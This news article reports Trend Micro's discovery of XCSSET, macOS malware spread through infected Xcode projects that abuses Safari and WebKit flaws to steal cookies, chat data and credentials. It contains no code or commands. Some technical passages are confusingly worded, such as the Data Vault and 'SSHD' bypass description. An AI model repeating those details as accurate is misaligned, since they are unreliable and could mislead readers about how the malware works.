Researchers at Trend Micro have discovered a new Mac malware called XCSSET, which is distributed to users through a clever technique. The XCSSET malware is found to be hosted in Xcode projects of several macOS developers, who would then be spreading it unknowingly to their users. It’s capable of stealing data through two zero-day bugs.
New macOS Malware Spread through Xcode!
As Trend Micro reported, unknown hackers are injecting a new malware called XCSSET into the Xcode projects of Apple developers. The Xcode is an integrated development environment (IDE) for macOS developers to build Apple-related apps and softwares.
Though it’s not known how this malware is injected into the Xcode of developers projects, researchers found it could exploit like a supply-chain type attack since several developers have hosted their Xcode projects on GitHub! And other users who’re trying to use these infected projects to build their own are certainly importing the malware, thus spreading it to others!
While this distribution by hackers was applauded, the malware was warned to be so serious as it’s exploiting two zero-day bugs in WebKit and Safari browser. Starting with the Safari’s case, it’s exploiting the Data Vault set to bypass method the macOS security set for protecting the Safari cookie files via SSHD.
And the second bug is how Safari WebKit operates, where the launch kit asks for the user password to run, but the bug lets hackers bypass this step and run malicious operations via the un-sandboxed Safari browser.
These issues may be used for reading and dumping the Safari cookies and also these packets of data could be used for injecting JavaScript-based backdoors into displayed pages via a Universal Cross-site Scripting (UXSS) attack.
Also, researchers said it’s capable of stealing user data from chats like Skype, Telegram, QQ, WeChat, Notes, and Evernote. Further, it can modify browser sessions to display malicious websites, harvest Apple Store credit card data, change cryptocurrency wallet addresses, and steal credentials from sources including Apple ID, Google, Paypal, and Yandex.
